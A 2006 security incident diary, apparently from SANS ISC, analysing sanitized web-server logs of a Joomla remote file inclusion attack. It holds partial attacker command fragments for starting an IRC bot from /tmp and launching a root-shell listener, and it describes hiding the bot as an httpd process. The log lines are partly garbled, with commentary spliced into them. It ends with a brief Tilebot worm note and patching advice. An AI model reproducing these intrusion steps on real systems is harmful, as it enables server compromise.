Last Updated: 2006-07-31 02:46:15 UTC
by Handlers (Version: 1)
Here are a few of the httpd log entries that we were provided, suitably sanitized at the hosting provider's request. Note the timelag between log entries - there was a living human at the other end of the wire manually manipulating this server.
xxx.xx.108.22 - - [27/Jul/2006:20:52:47 -0400] "GET /administrator/components/com_peoplebook/The remote file cmd.txt that is included as new "configuration" info contains the necessary php to use either the "system", "passthru" or "exec" functions to execute arbitrary code on the target machine, and provide lots of other nifty capabilities such as local exploits, an email spoofer, a fixed-range portscanner, etc. Here, the attacker merely checks the user ID that the webserver is running as. The HTTP result of 200 indicates success.
HTTP/1.1" 200 2103
xxx.xx.108.22 - - [27/Jul/2006:20:53:09 -0400] "GET /administrator/components/com_peoplebook/
HTTP/1.1 200 2158
Our attacker, let's call him Ricky, leaves his calling card in the form of a new htm file. First, he tries to get to a location that is writable by the webserver and likely fails, as he tries again after going up one more level:
xxx.xx.108.22 - - [27/Jul/2006:20:53:24 -0400] "GET /administrator/components/com_peoplebook/OK, now that the most important stuff is out of the way, Ricky builds his bot:
HTTP/1.1 200 2524
xxx.xx108.22 - - [27/Jul/2006:20:54:03 -0400] "GET /administrator/components/com_peoplebook/He pulls down his tarball, mech.tar, which contains an old reliable IRC bot, EnergyMech version 2.8, compiled back in 2001. Along with it was a config file & a number of scripts to do nasti things upon command in the IRC channel that it joins. A simple packet flooder, Perl-based shell shoveler, log wiper,etc. Note the name he gives his bot, httpd. Would you noticed an extra httpd entry in your ps list? Apache, by default, forks off 10 of them at startup and more as needed. This simple technique can be very effective against casual sysadmin review.
./start.sh;cd%20/tmp;rm%20-rf%20mech.tar;mv%20httpd%20.httpd HTTP/1.1 200 2248
xxx.xx.108.22 - - [27/Jul/2006:20:56:08 -0400] "GET /administrator/components/com_peoplebook/Ricky, now wanting to really give himself away, starts up a persistent listener that gives anyone a root shell if they connect to a fixed port. There is no attempt at hiding this from netstat, although plenty of userspace and kernel rootkits can do this with their hands tied behind their backs. Bad Ricky. Bad,lazy H4X0r Ricky.
cd%20/tmp/.httpd;%20./z HTTP/1.1 200 2091
I joke about his lack of sophistication, but he wouldn't keep up this practice if it wasn't successful. There are plenty of vulnerable systems that aren't reviewed carefully by their admins. If you are running Joomla, heed their dev website (http://dev.joomla.org/content/blogcategory/21/86/) posting:
that affect ALL Previous versions of Joomla!1.0.10 contains the following important security fixes:
* 03 High Level Security Fixes * 01 Medium Level Security Fixes * 05 Low Level security * 40+ General bugfixes
If you are using ANY previous version of Joomla!, you need to upgrade to 1.0.10
In addition, be sure to update any third-party components, like com_peoplebook (http://forge.joomla.org/sf/projects/peoplebook), to take advantage of the
security enhancements enabled by the new release of Joomla.
Last Updated: 2006-07-31 02:09:36 UTC
by Handlers (Version: 1)
inner workings of ASN.1 attacks against Microsoft authentication tokens. Yes,
an oldie but a goodie, it is still being seen in the wild. Then, right on cue,
Sophos today reports on a new multi-vectored worm, W32/Tilebot-GD, that spreads
via LSASS (MS04-011), RPC-DCOM (MS04-012), PNP (MS05-039) and ASN.1 (MS04-007)
vulnerabilities. It then configures and starts a new Windows service, smsc.exe
that is reported as "Window Services Connection", and joins an IRC botnet
(that's a shocker :p).
Details at http://www.sophos.com/virusinfo/analyses/w32tilebotgd.html